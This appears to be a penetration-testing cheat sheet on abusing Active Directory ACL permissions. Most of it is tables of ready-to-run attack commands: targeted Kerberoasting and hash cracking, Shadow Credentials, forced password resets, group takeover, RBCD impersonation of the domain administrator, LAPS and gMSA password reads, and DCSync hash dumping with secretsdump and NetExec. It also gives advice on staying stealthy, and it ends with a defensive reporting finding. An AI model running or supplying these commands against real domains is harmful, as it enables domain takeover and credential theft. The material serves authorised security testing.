Field Manual

Master AD ACLs

6 min read

πŸ›‘οΈ Methodology Checklist

  • Collect BloodHound data first β€” never abuse ACLs blind
  • Identify the right: GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword, AddMember/AddSelf, WriteSPN, AddKeyCredentialLink, Read[LAPS|GMSA]Password, DCSync
  • Pick the abuse primitive matching the target object type (User vs Group vs OU vs Domain)
  • Prefer Shadow Credentials / targetedKerberoast over password resets when stealth matters (resets are noisy and lock out the legitimate user)
  • Confirm DC reachability and clock skew before any Kerberos-based abuse
  • Clean up: drop added group memberships, revert SPNs, remove KeyCredentialLinks

🎯 Operational Context

Use when: BloodHound (or manual ACL enumeration) shows the controlled principal has an actionable right over a target object and you need the exact command to abuse it. Think Dumber First: The right tells you what’s possible; the object type tells you which tool to reach for. Match right + target type β†’ command. Don’t reset a password if targetedKerberoast or Shadow Credentials will do. Skip when: No path in BloodHound β€” go enumerate first (Master_AD_Commands).

⚑ Tactical Cheatsheet

GenericWrite on User

Update object’s attributes β€” most commonly abused via Targeted Kerberoasting or Shadow Credentials.

Targeted Kerberoasting

CommandTactical Outcome
targetedKerberoast.py -d [DOMAIN] --dc-ip [DC_IP] -u [USER] -p [PASS] --dc-host [DC] --request-user [TARGET_USER]Write SPN β†’ request TGS β†’ revert SPN
hashcat -m 13100 -a 0 [HASH_FILE] rockyou.txt --forceCrack TGS hash
john [HASH_FILE] --wordlist=rockyou.txtCrack TGS hash (John)

Shadow Credentials

CommandTactical Outcome
certipy shadow auto -u [USER]@[DOMAIN] -p [PASS] -account [TARGET_USER] -dc-ip [DC_IP]Add KeyCredentialLink β†’ PKINIT β†’ NT hash
certipy shadow auto -username [USER]@[DOMAIN] -k -account [TARGET_USER] -dc-ip [DC_IP]Same via Kerberos auth

GenericALL on User

Full rights to the object β€” change password or add to a group.

Change Password

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set password [TARGET_USER] [NEW_PASS]Reset target user password
net rpc password '[TARGET_USER]' '[NEW_PASS]' -U '[DOMAIN]'/'[USER]'%'[NTLM_HASH]' -S '[DC]' --pw-nt-hashReset via RPC (pass-the-hash)
net rpc password '[TARGET_USER]' '[NEW_PASS]' -U '[DOMAIN]'/'[USER]'%'[PASS]' -S '[DC]'Reset via RPC (password)

Add User to a Group

CommandTactical Outcome
net rpc group addmem [TARGET_GROUP] [NEW_MEMBER] -U [DOMAIN]/[USER] -S [DC]Add member via RPC
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add groupMember [TARGET_GROUP] [NEW_MEMBER]Add member via bloodyAD

RBCD (Resource-Based Constrained Delegation)

CommandTactical Outcome
rbcd.py -delegate-from [MACHINE] -delegate-to [TARGET] -dc-ip [DC_IP] -action write '[DOMAIN]/[USER]:[PASS]'Write msDS-AllowedToActOnBehalfOfOtherIdentity
getST.py -spn 'cifs/[DC]' -impersonate administrator -dc-ip [DC_IP] '[DOMAIN]/[MACHINE]:[PASS]'S4U2Self+S4U2Proxy β†’ impersonate DA
export KRB5CCNAME=administrator.ccacheLoad impersonated ticket

GenericALL on OU

CommandTactical Outcome
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal [USER] -target-dn '[OU_DN]' [DOMAIN]/[USER]:[PASS]Grant inherited FullControl over OU contents

ForceChangePassword

Ability to change a user’s password without knowing the old one.

CommandTactical Outcome
net rpc password [TARGET_USER] [NEW_PASS] -U "[DOMAIN]"/"[USER]"%"[PASS]" -S [DC]Reset via RPC
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set password [TARGET_USER] [NEW_PASS]Reset via bloodyAD
python rpcchangepwd.py [DOMAIN]/[USER]:[PASS]@[DC_IP] -newpass [NEW_PASS]Reset via rpcchangepwd
nxc smb [DC] -u [USER] -p [PASS] -M change-password -o USER='[TARGET_USER]' NEWPASS='[NEW_PASS]'Reset via NetExec module

AddMember

Ability to modify group membership.

CommandTactical Outcome
net rpc group addmem [TARGET_GROUP] [NEW_MEMBER] -U [DOMAIN]/[USER] -S [DC]Add member via RPC
bloodyAD.py --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add groupMember [TARGET_GROUP] [NEW_MEMBER]Add member via bloodyAD

AddSelf

The user has the ability to add itself to the target group.

CommandTactical Outcome
bloodyAD.py --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add groupMember [TARGET_GROUP] [USER]Add self to group

WriteOwner

Change object owner to attacker-controlled user β†’ take over the object.

CommandTactical Outcome
owneredit.py -action write -new-owner [USER] -target [TARGET] [DOMAIN]/[USER]:[PASS]Change object owner
dacledit.py -action 'write' -rights 'FullControl' -principal [USER] -target-dn [DN] '[DOMAIN]/[USER]:[PASS]'Grant self FullControl
dacledit.py -action 'write' -rights 'WriteMembers' -principal [USER] -target-dn [DN] '[DOMAIN]/[USER]:[PASS]'Grant self WriteMembers (group-only takeover)
bloodyAD.py --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add groupMember [TARGET_GROUP] [USER]Add self after ownership change

WriteSPN

Ability to write the servicePrincipalName attribute on the target user β†’ Kerberoast.

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [TARGET] servicePrincipalName -v 'fake/spn'Write fake SPN
GetUserSPNs.py [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -requestRequest TGS for the planted SPN
targetedKerberoast.py -d [DOMAIN] --dc-ip [DC_IP] -u [USER] -p [PASS] --dc-host [DC] --request-user [TARGET_USER]One-shot: write SPN, request, revert

Plant a certificate in msDS-KeyCredentialLink β†’ PKINIT β†’ NT hash (Shadow Credentials).

CommandTactical Outcome
pywhisker.py -d [DOMAIN] --dc-ip [DC_IP] -u [USER] -p [PASS] --target [TARGET] --action addAdd KeyCredentialLink + write PFX
gettgtpkinit.py -cert-pfx [PFX_FILE] -pfx-pass [PFX_PASS] [DOMAIN]/[TARGET] ticket.ccache -dc-ip [DC_IP]PKINIT β†’ TGT
getnthash.py [DOMAIN]/[TARGET] -k [KEY] -dc-ip [DC_IP]Extract NT hash from TGT
certipy shadow auto -u [USER]@[DOMAIN] -p [PASS] -account [TARGET_USER] -dc-ip [DC_IP]One-shot equivalent via Certipy

ReadLAPSPassword

CommandTactical Outcome
nxc smb [TARGET] -u [USER] -p [PASS] --lapsRead LAPS-managed local admin passwords

ReadGMSAPassword

CommandTactical Outcome
nxc ldap [TARGET] -u [USER] -p [PASS] --gmsaRead gMSA managed password blob β†’ NT hash

DCSync

Principal has DS-Replication-Get-Changes + DS-Replication-Get-Changes-All on the domain object.

CommandTactical Outcome
secretsdump.py [DOMAIN]/[USER]:[PASS]@[DC]DCSync (password)
secretsdump.py [DOMAIN]/[USER]@[DC] -hashes :[NTLM_HASH]DCSync (pass-the-hash)
secretsdump.py [DC] -kDCSync (Kerberos ticket)
nxc smb [TARGET] -u [USER] -p [PASS] --ntdsDCSync via NetExec
nxc smb [TARGET] --use-kcache --ntdsDCSync via NetExec using cached ticket

πŸ”¬ Deep Dive & Workflow

ACL Abuse Decision Matrix

RightTargetExploitation
ForceChangePasswordUserReset password without knowing the current one
GenericWriteUserAssign fake SPN β†’ targeted Kerberoast
GenericWriteGroupAdd users to the group
GenericAllUser/ComputerFull control β€” Kerberoast, reset password, or LAPS read
AddSelf / AddMembersGroupAdd yourself / any user to the group
WriteDACLObjectWrite new ACEs β€” grant yourself DCSync rights
ReadGMSAPasswordgMSAExtract Group Managed Service Account password

πŸ› οΈ Troubleshooting & Edge Cases

ProblemCauseFix
KRB_AP_ERR_SKEW on Kerberos abuseClock drift > 5 min from DCsudo ntpdate [DC] or sudo rdate -n [DC]
STATUS_ACCESS_DENIED on dacledit/ownereditStale BloodHound data β€” right was revokedRe-collect BloodHound; check ACE inheritance and explicit DENY
targetedKerberoast returns no hashSPN write rolled back before TGS requestRun with verbose flag; verify SPN landed via Get-DomainUser -Identity [TARGET_USER]
Shadow Credentials fails with KDC_ERR_CLIENT_NOT_TRUSTEDDC has no NTAuth cert / PKINIT not configuredFall back to password reset or targeted Kerberoast
bloodyAD LDAP bind fails over plaintextDC enforces LDAP signing/channel bindingUse --ldaps or Kerberos auth (-k)
Password reset visibly breaks the accountHelpdesk ticket incomingPrefer Shadow Credentials / targeted Kerberoast; reset only as last resort and on stale/service accounts

πŸ“ Reporting Trigger

Finding Title: Excessive Active Directory ACL Permissions Enable Domain Privilege Escalation Impact: Misconfigured ACEs (GenericAll / GenericWrite / WriteOwner / WriteDACL / ForceChangePassword / DCSync) on high-value AD objects allow lower-privileged principals to take over users, groups, OUs, and ultimately the domain via well-documented abuse primitives (Shadow Credentials, targeted Kerberoasting, RBCD, DCSync). Root Cause: Delegated permissions granted without least-privilege review; legacy admin groups carrying inherited rights; service accounts owning user objects they should not. Recommendation: Audit ACLs on Tier 0 objects (Domain, Domain Controllers OU, AdminSDHolder, krbtgt, privileged groups). Remove non-essential ACEs. Protect privileged users with Protected Users group + sensitive-and-cannot-be-delegated flag. Monitor for KeyCredentialLink writes and SPN modifications.

πŸ”— Related Nodes

Graph View

Backlinks